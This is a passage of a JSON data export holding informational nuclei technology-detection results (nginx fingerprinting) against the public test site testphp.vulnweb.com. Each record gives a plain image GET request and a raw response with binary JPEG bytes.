"https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0' 'http://testphp.vulnweb.com/pictures/5.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/5.jpg.tn", + "discovered_date": "2024-11-13T02:35:01.591Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/5.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4428\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:35:01 GMT\r\nEtag: "4dca64a1-114c"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001b\u0002\u0003\u0001\u0001\u0001\u0004\u0002\u0003\u0005\u0001\u0007\u0006��2\u0010\u0002\u0002\u0001\u0003\u0003\u0002\u0004\u0006\u0002\u0002\u0003\u0001\u0001\u0002\u0003\u0011\u0004\u0012!1AQ\u0013"\u00052aq\u0006\u0014#B����R�\u0015b�r��\u001b\u0001\u0001\u0005\u0001\u0001\u0002\u0001\u0003\u0004\u0005\u0006\u0007��/\u0011\u0001\u0003\u0002\u0005\u0001\u0007\u0004\u0002\u0003\u0001\u0002\u0003\u0004\u0011\u0005\u0012!1A\u0013Qaq����"���\u0006�\u00142���\f\u0003\u0001\u0002\u0011\u0003\u0011?�\u001a�d�������0�V\u0015��gQ�%XmƲ ��Tg6�ru�Ʋ0��G\n>2y��d�EV\u0019m}3�1��<*������qY\u0016`��d��6�k"�w��r�{0�qY.��\u0019*>3��F\u001e\u0013u�\f�\u000f\u0018�Du2i��h.�H�2��\t\u0019^Ӗ�.z*�J��\u001d\u0014\u0002�@2ء\u0012\t\u0018=�+\u0012T\u00176.�-��EcZA\u0012,�*�!\t\u0003o\u0007�:�<��x����Fh�u�'\u000b\b6\u0001&�\u0003��\f4\r�|�Ӽ�@\u0005��>[$LL\r2Ѡ���\u0019ƈ���Ӆ�����\u0007�=N��2<t�R�*Xr�r�\u001d8?+\u000b�#2H��1�\u0012D�ሠ\u0006�6�9\u0006�o�}�\u0001`ֻV�V\f���./c�Y�p��4�z\u000fH�\u0011V\n��\u001b��u�\u0012)X\u0005�n��:��aU\u0004��\r?�?�\b�\rm^�����\r}��\nF�\u0019��I\u0004J�\u0015:�\u0003�d�?��SϬ��$!�j\u0004�6�_�_\u001fk�\r\\��UM4�(\b\u0016\u0017$����t���x$\u000e\u0019\u0003q�#ʚ�>�+\u001a9�3�;V��8��c��Lz\u0007Ӽ�6�53�\u0012�eZ8\t4\u0018���J�\u001c\u000e��4�@��M��1���\u0005EF�r9*H�(qV\u000b���,�q��������m��%� �\u0006�B�p�\u0004�1b\u0010��j9$�}?���,[M���\u0001\u001b�kQ\u001dױ�`�+l�iqf����Ww�%+\u0018���]���$�p/8󿡣�@���r�E�k\u001d�6<�\b��c\u0006�IYX���/�q��R:\u0018�5\n^%e\u001eǐ�\u0007��U}��<��&��R��)\u0012H��\r���<�9�&�W�I6�?a?9���!�uR��51>�\u000e��\u001e\u001dDl-8;ā����6\u000f?B\u001b\\n�jꧠ��q~c��i����$SH�\u00132L�@�W�*ё�f�z��+��m9���\u0014�b*��V�Z4o���V��\u001a�ٷJʭ�H�����\u000ex��\u001b�(��%�;+��U0��XKo���hi�\r4~��~`��(b»�z׎����h@`���6�eGݶ��V\b�\u0005�ʦ���6���\r�;�\u001d\t�@��s�C\u0014r�R3\u001f��2\t\u0014i���TG�:\u0010\b���B�'�(\\e�p� |�R�.�\u000b���t\u0005��\u0002C��7\u0016���"����8�\u0007M�E$,�&\u0014\u000e�<�\u0007��\u001d\t�4�JҼ�~��9jC,d�ف\u001c\u0001�;�]�\u0007kZ߇��P��\u0015�2�(k��/�\u0011�M���:�d�N�����林ԝ�CpX��8�/�\u0016<�\u001c�8������'�kkb�u\u0011G/�^O�T\u0014x�}Gׯ�Š�sJ\u0015�e\n�w�ZW�\r\u001e/�W{]{\u0005��UQ22]a}{�>]OK��F�*D&�7;��{��Q\u0010���C�P�G����v(\u0001��O8�ZWi��\u0001i#4֥A�ш��sW]��\u0013$�4N\u001fiV�n�\u0006\u001c��\u0010~��9#\u0001:\u0015F�H\u0003���\u0001��S���"��A%��x��\u000fw5���\u0003*�\u0003\u0016�IY�HY\u001byqE@��5��o�۾��\u0012(U_dP�V4-)$�J,�l�"��ךˌ\r,pƞ�s���\u00197B��-�C�m��\u000f\u0016\r��B�f�\u001b\u0014����\u001fE�ڄ����18��\u001d��UoU��"�оؤӳ0\u0006�p3cT����#�5\r$6x�\u0010z�&ʶ�Th\u001a#�V-\u0002j\u0002\u0015\u0005\t��\t\u0014M_#�\u001b�\u0005\u001e/+�óJ���F���%�K��R�F�*�2����~��hi�%d�4�Ez�\u0015BG�\u0006�5`t�\u0003�������*��I�\u000eù�9<e��@����xԊfQVv�@�]��xÂ��zI��c�\u0005u�A#*:�B\u0003Q�M\u0003G�DgSB���ޑ3����Z��\u0001�y\u0001�t錬\n�$��]\u0001\u0004�ˎ�x�\t��Y�\u0002��:d\u001a�A\u0010�f�\u001c�-�{�-tv݁���V2�.W5Y�\u0018\u000bKέ��,yt蓕�U��fP�[o�]\u0001aۥu'\u0011\u0012)��+\u0017ݹ\u001c8*\b,\b�{w\u0007���I�]\u0013Țy�\u0012eYD�C!dV\u001e�\t5�A�\u0002��\u000eT�B}k��1�2�K\u001f\u0014��.k\\30��F.ڗ\bݭ�}�j�,o�[\u0013\u001b\u001c�\u001a�<Qʂ�ov]�`�n��\u0012mH��^�古T�|r��]�\u0002O\u0015�u'�\u001c���������$�\u00166�rgK��]��\u0019����:�\n_;��}�\r�j\u0010�����sn�N�]��뷋��L�L�E\u0014Q�Wolq�v\u0002�/h#ڶ;��rT\u001b����1X�{I{@��d��d�\u000fóG�D�j�(Ν��\tm\u001f1a@��r7X\r^E�@�t�!�U�+\u001bI��GP\u0019�\nwn��\u0010\u000f\u001b�b\u000fZ 篡�ӟO<���bd(����i�n��o\u001b���q��������7z\u0016#�U���������fe^\u001a���.kYrQ�4E�5����d��\u001c\u0002NԠ�\u0010��$w��O�0$\u0012��x���L���\u0004��.�lR�c�H5���Ŭ1��Y\n�\u0006�\\\u0005\u0003�_<�n�՞2��'u�84s�B\u001a��i��J\u0002�*�GI1�a\u0011�6�T��\u000b*�\u000bW�\u001f�~���P`��P��ۻ1w��fbI�9���h��\b����\u0015QI&�\u0001G=z<��\u0015_\u0012�i\u0001/c@��ZS�H��b\u0012��\u0018�K�`R9w,G\u0002\r_S���K�ַZ��~!9�4��5Dc܇jPF\u001cݐ�l}�{4���锉��*fm�����׻h\u0015f��\u0019{z!��\u001d8W`_���\u0005�W`C��o�=M�\fG\u000fu`\u0001���\u0010\u0019%<��fk����I/�4_\u0001�/�f_�,(�HǫРM�=\u0005�?z�mY;����\t\nzu��篃]\u000em|GYꬔ�B�%MY՟�\u0017]<�kkUQ\u0015���V76�D�������\f�������/�p�M\u0010!����o��J�[�;\u001b\u0004_RB�#\u0005��@�� �=8$_�p�Y\nV�2\u0016�%��\u0007��yѨgӘ\r\u0018�=7W��\u001f�\u0016�|\u001b=1��b�+�<�� <O�j�\u0003V玎�+~�Q����x���\u001d��?\u0010O,_��'��C\u001bN�b�<�n\n\u0018��n��\u0018�\u0015d_��N\u0011��;�\fȼ���͑��{4�tq�:HF�I57"�\f�\u0013a�F��������B��'$���\u0019cy^��8���\u001e6�^E�\u000e_����ru��La��\u0019�6�\r\u0005t$\u0017b�\u0016�kn9�U���?�U�m�\u0015��O5|�z#��;.��Ԛ�i*���v�b\u0005� ]mcԟq��\f�l��\t%E�\u001c�'?��O\u0007�'��)�њ8�\u000b�u\u0006�Y���nQ�ߥ�9��\u0002\r\n��W\u0015�����i�u�qFY�)U�n��\u0002��ӽ\u000b$�,~f#(t��87���G>*�}z��/{�@5S��z\u0016�\n�!f�H�\u0019\u0002m\f�6��n�\u001b`\u0005�NVȻ\u0013�9\u0004��]����7W�,�,��_zG\fP@�!�\u0004h��\n\u0005\u0001}�;�p�,��d��Z�O\u0003�j<�t�\b�A2\u001a�\u0013|u�+��*�S�Ԑ\u0011�3���������h��?A�V2\t�,�\u0015��*���A�Zy����d'k*�-�M����n�\u0007��\u0016E�S\u0011C\u000b�%���_�}�50j\u0016#�i�ƀ���W�U��j�y�1\u000b\u0006��\u0013��$��2Q�uA��P��I�2i=�\u001b��\rq�h�P+�\t��$��\r$���x�`��\u0001\u0007�\u0004U����p\u0004E�Ԅt8�Dl!����\u000e��\u0016���%�j&�\u001eÓҸ\u001c�\u0005��uh�eT\by��ہ\u0016v��]��;���k�^��/#6�����l�\b\u0015`\u0002�x\u0007�8�{<�\u0007\u0006�\u0015���ZD�\u0002Á�Z�Yv�3X�x�]�\u000b9:v����\u001c\u001fo��*�t������l'���\u0015d�)�XC����A?�[�;\u001e0̆�\u0006���{$�:\u0011~E�\u001eˌE_�:�cd�6����@\t x\u001f�ZX�0���r\b�\u000b&�X5q��W��\u00114!Ķ(\u000b�P�\u0015�!`�\fQP��\u0016]���S@(n�\u0015<�?sB�h����=\u001e,�&�63��׿mO�ȅ\t I�C\u001c��\u0010�ɽ�ŀ꠆�u\u0004\u001a�#��|�`j��T�\u0014h�1=�\u0004W ݃�&󷦱�fU\u0014\u000b��#�O'��F�>y�\u0013�1���|�&U\u0004�`,{�\n8�g�$���N�!sjň\u00062�]\u001b����Uu�s����s�`t%�T�\u001bzr���\u001bd$h�����&�鿱Q��Z2��J�E3�.��#���\njd3\u0015�L��R�E��d�\u001cw<p:_$N҅�Nc\u0006��\nO���T�5\b�G#iF�\u0011?.����@������Y�y\u001c�̞h*gf\u0014�3-�N��#B;��z���b\u00074t�E�P�ʦ3 ��v��H\u0004\u000b�\u0016y=,���\u0014�"x�\u0002�����J�\u0005J�<�$�\u0004U^Dح�כ\u001dc�c\u001aK��K_���9^\u0018�W�aZ�]��Զ’\u0002�T�\u0006(y��\u000f���9c\u001c<�\u0014���,�t��Y��_o\u0019\u0016������7��b�T��cma��q�Y�^\u0017��N#V+�q�.�C"���L\b�M��:\u0002~�k�|�}�xA�*���8����Y\u00022�*�\u0004\n6��\u0001�\u0003���\u000e+�I\u001e�T\u0004\u0006�*�t�/8Xb��\f�akr��V4��$���Cvp��.W�\b\u001a�\r��5F\u0016�7F�o[�\u001d�#��w}1��n\u0010MHٛ���k��L�,Z��\u0005\u0014Esȫ\u0007�:x�k�U��h�~ߘ���^*��\u0019��8X���|x4L:�Ga����]Z�\u001b,jC9�!�\u001e\b����ŞVaL���Qg9~p\f��+���\u0019�\u001a��l�p�\u0018�Q�\f1'F\u0018a�$g\u0018�\u0018c\u0014�u\u001d��o�\u0018bR���\u0018`�F\u0018a�$a�\u0018�Fr�\u0018bF�a�\u0018(���", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 294, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.57' 'http://testphp.vulnweb.com/pictures/6.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/6.jpg.tn", + "discovered_date": "2024-11-13T02:35:04.649Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/6.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.57\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4345\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:35:04 GMT\r\nEtag: "4dca64a1-10f9"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001d\u0001\u0001\u0005\u0001\u0001\u0001\u0004\u0003\u0005\u0006\u0007\b\t\u0002\u0001��:\u0010\u0002\u0001\u0003\u0003\u0002\u0005\u0001\u0006\u0004\u0004\u0007\u0001\u0001\u0002\u0003\u0004\u0011\u0005\u0012!\u00061\u0007\u0013"AQa\u00142q���\u0015#B�\bR��\u0016$br������\u001b\u0001\u0001\u0005\u0001\u0001\u0001\u0002\u0003\u0004\u0006\u0005\u0007��0\u0011\u0002\u0002\u0001\u0003\u0003\u0001\u0006\u0005\u0005\u0001\u0001\u0002\u0003\u0011\u0004!1\u0005\u0012A"\u0006\u0013\u0014aq�2����BQ������\f\u0003\u0001\u0002\u0011\u0003\u0011?�JR��~���'�\rz5���[��PU�pT\u0012\t�$�a߷֛)�\u001f��T��ĩUn ��y!�7�Xث��\n�pA\u0007�~C\u001b�*�\u0012���*���O`)�\u0014�[n?\u000bm���_��Fv���@Hls���X���:�u\u000f��ݣ�e.��"�G�#<7��#\u0004�0Mh�)�q.\t\u001dR^\t�\u0015�\u0017�]iڽ��-�\u0013,',���\u0018��<�;��gu\u001e�\u000e����P\t�e�7*��'����M��\fVR�LH������\f\u001c�ˑ�\u0007\u0015�i]=\u0012�+.X\u00101���9\u0003۵f��I����\u0005��Ma\u001cg��M�^�kp1$M��\u0010\u000f�\u0019��\u0011�"�WV�/OEu%�\u0017\u0010�,�ݸ>p0�l��\u0003 �\\v��=K�E�ot���[iZ3�\n�\u0001����\u001f��E���;rS��[-ԥ*�\b�)@\nR��)@\nR�DŽ�\u001a����x��\u0012��६�C ~1�\u001c烐p1ۜT:�Ezx;,xHt ���/��[T��Oan��\u0014�6]FH ��~\u000e����Ji��\u0014��j;���OW�\u001f�\u001f53��4��n$��9\u0012eo0�`�b�9\u0001�#,��\u0004��Y����.\u0012g�[{�\\1\f������������azj����->���Ma��\u0011�ꚽ��\u0018f�G�q\u0012&�&3��Q�0T��������E�[^�Is�tp�[1\f{�\r��~\u0004�z�5�G\u0012eG�:�@8'�\u001e@� \u0001��H�\\6����8�� �\u001c�ƌz��;��1�y��\u0013\\�=���\n*\\~ÝUJO(�ZD!\u0002$��e�\u000eCn\u001fF\u001c\u001fʯ�t�w�K\u001cc\u0002u-\u001b�68�\u0019?\\sߜ�qY���$���뱉b\n���>~�Z��8S�Q���s�U;z����̙(��[�X]DV\u001b�W}�\u0002\\\t\u001c\u001e���\b�Y��h�F��\n4��a��8�l�\u001e;�\u0013�*�5��^-��3�\u0001 pO������k\u0003\u0018�n#B\u0019J�<�\u001e��]F��/�'zQ��d�0\\}�y\u001b|ou4H\u0013��Y�g#��3\\��$�\u0017�����A"G�Z��1�y�&7���3��}��.���NH��0�\r�g\t�L\u0012���X\u000f�\u001e\u001f���ؠ��\u001e�\f�u��p��\f��\u0014�\\��\u0007\u0007\u0018=N��#��E��/)���7�{\f.N �JԬ��o�,�#1����J��������*-zj�tr�*�A"���a\u0013�"�\u000e\u000b\t������@\nR��)@\nݽ\u0019�\u000e��tJi7�;\u000f�\b\u001d\u0004W6Q�^bn\u001b��r�\u0001݇\fG�q��*U}N��TT-YI�t&��\u0013�n���7�tKy�n-�%x\u0004�\bϨ\f.C\u0002ʳ\u0005$pH8�\b[��"]�-���,�r-\\\u0004i��#.Oel\u0010\u001b�;O#\u0019�O\n�@��}n9�.�\u000f i�\u0007��o�\u0003�\nϺ��[�g�4�m<�:��Y��+mf���n�\u0015�M��Fw��\u0007z�_�ŰԿq�1��\u001f,y-���[��}2�\u0005 x�Q<Bkq'\u000f�\u0003r���I\u0003\u001f\u0004|\u001a�%�b΀�\u0007'��.��g�����ݕ����\u0015i!�+�1�\u0001\u000e�%�\u0018����F+=�b��1ナ�YMt݋��ș�\u0019Dt��\u0014\\�\u000e_fcRC}x�\u000fDZ�>�\rݵմ�kr�\u0016��ψ��^0Ɂ�\\\u0013�\u00169<�\u0001W8�Y�z\u0015<�;Np�����U\u0003�\u0004\u000eǸ��Дc?W\u0001��"�\\%�@��'\u0001��ʺ�����=�\u001a�P��7��\u001f� �K;��\u001c��\u0006\t\\z�\u0017�\u0005��0��rx\u0018\u0019�n)�M��_�G"5�I%��\t\u0002V�����qT��/,\u000e�\u0019]C�\u0003��\n��\u0003R���a\u0001\u0016�\u0014h�E��1\u0004�p\u000f\u001f8��QU\\��\u0016^E�74w��\u0010�p�sG�b�\u0015\u0001fE?˺���l\u0003\u001e;\u0006��.\u0003ᯄ6�\u00163[u��MQ�%b��hT*�0R;�'��\\`溺�$��<�(0�\u0018�|`��U�P��]ķ�!�B�>0T�a\t��\u0019\u001e�\u0011�gAG]�Q��f���RǏ��"�\u001c��5~��t��M�6��$p��I��+�m�\f\u0002{�x��9\u000bZ�.�mR�O�����r���<\u0010\u000e\b�}\rz;\fP�\u001cN�dP7F㜃��pG��\\��'|5�L\u000f�Z4\u0011��)k����I�#.J�z\u0007$�=9�8\u0002�~�u��t^��\u001f_�3Q\u00055���\\�)[€�)@\nR��)@\u001d5�7�K'H�\u001a���}.O9\u001eFr\u0004\u001d�*�\u000b(�\r��v\u001c1<o��EK[����1R$i\u000b\u0015�c@����\r���\u001c�\n��@�nt]R\u001b�6ı��̧�S��Eu����%��q̗��л\u001c\u0003�$�\u0019��)��\f�\rb���**WU���Ogz�f�Ԅ����\u001d��-< *��d1��\u0014c<\u001f�q����j���Im$��:\u000f0\u0014V_Ab\u0007��\u0004\u0015*W$����Z����;M\u0006�SYLRYrʌ]��\u0014\u000e\u0007��\u00198�\t�lU�ÿ\u0013���d�\u0013ej���e���\u001f��\u0018e*�6{z\u0018}�\u000e\u001d\u001d3U\n%j_-��G�4�2����������1��bIc�f\u0001ܣ%\u001aA�'�RN\u0014\n�b>ߤ���>Z2�g\b��r��r\n�#���-N���\t�l�2�BF\u000f�\u0011�E}i��'��ܬ2yh��lM����@?�\u000f\u001d��)O�\u0012�"4��\u0017\u000b4A�ӆ(�N@e$0\u0007\u0003 \u0010Goj4�b��W\u0002\t1�g<q��?\u000b�1���N\u0013��X���8\u000e��1\u001a�\u0007�rs��J�4{�{eNy��l���N�'\r��ڟ%��9?�\\H��樑d\u000e�y�vc\u0018�l\u001eC\f��c?��u\u0017�:�\u0018\u0015 ���9\u0007����E��h�f��N�? g�##>٩v�)q\n�\u0013\u0006\f��\u001d�����9+������5�أ%��}�\u0018x݁uw<r2�y�\u0019�܏bI0z�N�R���h�{gc�G*���F\u0018!�\u000er;\f��o�!�X���v��\u0003\u0003;� d�H'\u0007��y\u0014Yb����/\u001f���\u0016����Bj:O^����ks~��e��\u000b��\f7#�\u0001�Or\u0006\u0001\f=��ֽ\u0019��eݬ\u001a�������Ȍ\u001d\u001cP\f?�O\u0004w\u0007�A=ܶV�k�$� ���Ci+\u0016$$�\u0017�9>�\u0019\u001c\f2ջ�.���Γ�ѵ+cotS̷�\u001b\\E0�\n�3�0r\u0001*���6�j��\\m��\u001e�����^zd����Vs�x[��e��uu�I�m8o�t�\u0018���\t�̀\u001eX\f.\u0018\u001c\u0015l`ղ���Y�I�\n�.<�R� ���+$鞮�zz�h�Xs�E��S\u00122G>�c��t��\u0011�ĖP���&˩�M\u0014��w<�����,\t�>�P)�j7:N�\r唅'��\u0003�~��j\u0015)ZMa��:��z�\u0014�i.\r�0��b�6�.~�\u0012I��Ͼs���������[�V\r���˒�\u0016%s�<���5����\\�G�7NH��w���<Ռ>F@,�w\u0003�s�9"�����=jd&W��ԏ1�m��ڟ@��ܱ��\u0005�4��l�Q�K)�|c�:TNV�&f):��\f9��\u0003������\u000f|��H��Kx�9�Ya�\f�T��.J��]�%�w�|�&0�w\u0003�\u000foҲ�\u000eܢ�c�a�\\SP��\u0011$2��7\u001b��|~+\u001b��[[����0$�ô\u0010s�~y�g�����-/��_4D�ޑ���9��@\u001f#��S5m@\\�\u001e�0ϸ�2��($��}���N\u001a\u0019S-�c��62�5�V�t���VR�\u0019�~�F\b �`�Ի=v���V2<�\u0002�bA��1' �3ܑ�yƓ��R�U�\u001d��\u0018�E��9ܟ�\u0003۱����T=T�ƭ��RyU7�*��\tu\u0005�G\u0003qQ���ƬˢO�e��\u0010���Q�:��5�s�F�l�\b#�\u000fЃ����ZMom��s2��}���`\u001229�\b�����#��{v�\u001c��V�\u0018u#��@��\\��_X��RА;\\+�Y�}\u0003��\u001c��+��*N���)���?an�W\u0013lx��/��\u0017���t�wD4N��I�\u001d���\u001d�@? v���r9��������ו���7%�9��5N�=?�ס��~Ne��\u001eX�)Wȅ)JR��\u0005)J��^ɧjVװ�2[Ȳ�e\f\t\u00078 �\b�\u0011��۾��P�M�Fb�H��\u000b�\\+/\u0003�\u000e\t�\u0013���j�tް�,��k\u0015t{kv-\u0018 �\\�\u0006�\u0012H�&���\u0004un2���znu��}#]\u000f:��=9a�~ď�\u001a��j�V���ʪ\u00103��\u0006I\u001e��{r\u0007\u0015�4\u001dXKio{lΚh��)%\u001e�\u0018��\u001d�\u001c\u0015��c���\u001da\u0016�u\u0004s�C\u0018\u000b$C'w�\u0004��n\r��������\u0014]��G,�u7_ZOc\u0006�\u0010H�l����� s��\u001fp\u0006@'�����K4\u0010�{\u0015IJ@]�\u0016m\ny�8\u0018���\u001a�ɼ�.n��3J�\u0015��I��Q���#�Ը�り�Y�z�\u000b���}F�\u0012\u001a7��ubC����x8��8�Z.���v�����[\u001fO�I\f��F�� �#�\u0013�V�U�\b��cn\b���rX��e��|�=��A�(PB��m\\\u001eG\n���'V��\rA�Mf���w�!*�����[�QU����\u0016\u0007J�K�JR�\u0018)JP\u0002��)JP\u0002��)JP\u0006ᖳq��]?%�\ry����� �\b�;f����f��ۉ�\n�Y��4���X�Q�N�$��iJ�\u0018�s��Hߤ�Ҕ�$b��)JP\u0002����", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 295, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 Edg/93.0.961.52' 'http://testphp.vulnweb.com/pictures/8.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/8.jpg.tn", + "discovered_date": "2024-11-13T02:35:04.749Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/8.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 Edg/93.0.961.52\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4139\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:35:04 GMT\r\nEtag: "4dca64a1-102b"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0005\u0001\u0001\u0001\u0006\u0002\u0003\u0004\u0005\u0001\u0007\b��;\u0010\u0001\u0003\u0002\u0004\u0002\u0006\b\u0005\u0004\u0002\u0003\u0001\u0002\u0003\u0011\u0004\u0005\u0012!1AQ\u0006\u0013"aq�\u00142T�����$B���\u0015#3�Rb4r���\u001b\u0001\u0002\u0003\u0001\u0001\u0001\u0001\u0002\u0003\u0004\u0005\u0006\u0007��(\u0011\u0002\u0001\u0003\u0003\u0004\u0002\u0002\u0003\u0001\u0001\u0002\u0003\u0011!\u0004\u00141\u0005\u0012AQ\u0013\u0015"B2ab���\f\u0003\u0001\u0002\u0011\u0003\u0011?�S�K��@�\u001bU\u0010z�~\u001d*D���@e��\u0012+�oQ��Vߩ�}I�����{9%L�Oy\u0014ÃX�z�?��h�"2��0\u000f�5ޤѺ�\u000bU��Z|\f���vv�����\u0003)����i��R���Eã�o�t\u001f\u0014\nc�5�uB�\u000fq����\u001b���t�H�)�l\u0007�� N\u0015{\u001e�\u0003�U]�7\u0012`�\tM��aT��h�k�-&\u001el)=�\u0002�F\u0013k��\u0018���W6��$��S��u�\u000ey�eQ��\u0015�I9g��\u0017�0$�\u0015��56\f�m��#�����N�Oq�����Ʋh|���I/2\u001a,-���$w\u001d~uE�[ ������V�����"<�H�\f��;�\u0015R+.A��G.F\u0018K\u0003vTڞ�e\u0013��>�\u0002p\u0007`�_�:�\u0018\u0002�0A�ދ�C�\\!�\u001eJ�����\n�H�U+Z�wQkXBS�m�\u0014װ�3B�Ȏ\u0019������+J7�\t��hI���\u0016j\u0003�G΋��{C?\u0018�\u0013`6�d��3�=s��`��(�ȟ3�����\u001b'��wཥ��W\u0005�M|b��\u001fW<ظ\u0007�\t�\u0015Q�����\u001e%?J3�\u000f�����[\u000e7\f�b�օt� 3�.\u0006���趹\u001f����FYl=���R�a�\f�B���YO�\u001f���C_:i��ײ��FY,=���R�a�\f�b���YO�\u0012�\u0007�e@Gq�Յ�&G���[\u000fhg�\u0014�X{C?\u0018��\u0019t� \u00118j�\u0012�\u0011�jSa;2G�\u0013F�,=���Rɇ�C?\u0018��#��`8�ZOe$yԨ�RwfO2h�%��3��Yp�hg�\u00147�}6��\u0010\f(��\u001esK��De\u0003�Q�\u0016#k�~1K�^���(oE��~��0����OvSL\u00188V�\bO�@��{K_\u0018�E��埌Q�1�NH�\u001c��� M������\u0013���;W$�ӷ�\r�\rZ�$;m�c(\n�T\u0001�I�4��~��Ņ�׽z\u0016�\u0014 \u0001�E�$�xk\u001bl8p�ϨR�\b�\u001d-Ŵ;���L!��V\u0016�\u0002�+�\u0003��\u001f|�u��b\bk�.:�\b�LƁZ�Ѓ�X���h/���.B�eH))!! 